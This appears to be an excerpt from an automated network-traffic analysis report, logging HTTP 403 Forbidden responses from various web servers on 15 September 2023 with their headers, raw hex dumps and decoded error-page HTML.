              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8O%2BiKLw1hZfUtMvYA8KVdYVgtG4vtGE%2BuQh5xZ9sojj9umbAb6U4JCLaA5Q90I7QP8mxXyzw0dVRLMs%2FLtmGsvq5EI4IVEkYWyT0qRqnUIlBdaP8fQvYRQVGgq%2FJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e76365a980f7d-EWRalt-svc: h3=":443"; ma=86400Data Raw: 32 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b Data Ascii: 2bb<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="mar
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:39 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Fri, 19 Feb 2021 02:51:55 GMTETag: "713-5bba788fb1c60"Accept-Ranges: bytesContent-Length: 1811Keep-Alive: timeout=5, max=100Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 20 34 30 33 20 2d 20 46 6f 72 62 69 64 64 65 6e 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 34 34 34 34 34 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 45 45 45 45 45 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 54 72 65 62 75 63 68 65 74 20 4d 53 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 68 31 20 7b 7d 0a 20 20 20 20 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 65 6d 3b 20 7d 0a 20 20 20 20 23 70 61 67 65 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 34 70 78 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 32 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 23 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 33 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 37 35 30 37 36 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 34 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 43 35 35 30 34 32 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 15 Sep 2023 05:27:39 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:27:39 GMTContent-Type: text/htmlContent-Length: 75193Connection: keep-aliveVary: Accept-EncodingETag: "61e91823-125b9"Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 2d 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 25 37 43 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 66 69 74 2d 77 69 64 65 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:40 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Fri, 15 Sep 2023 05:27:55 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nfpqoq454kKCOVHUh4WKsobQbaLoGxrc4YluWBed0jFLN7SeduvSMIavojcEVEeLY9UoUOfItHqa5FYgBSdctMT6sxdh%2FE%2FLb9f4lISD3E8%2Bl5HlFfJJAA5wFnBx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e763e2d83c343-EWRalt-svc: h3=":443"; ma=86400Data Raw: 31 35 65 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 Data Ascii: 15e5<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Fay7L1o9xIAe%2FO77Q69dzDPYGSSTHs7uXjOYCDj2bow9W%2Fp%2Bn%2FZOswRNNIwmWOcOoNMly1PJsJ3m1RW3ydZAzgm%2BL5eMb3HZCF5kdLln%2BS3oRgK5g7L0fNhlKlp%2FKdo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e763b3db54385-EWRalt-svc: h3=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:40 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:41 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Fri, 19 Feb 2021 02:51:55 GMTETag: "713-5bba788fb1c60"Accept-Ranges: bytesContent-Length: 1811Keep-Alive: timeout=5, max=100Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 20 34 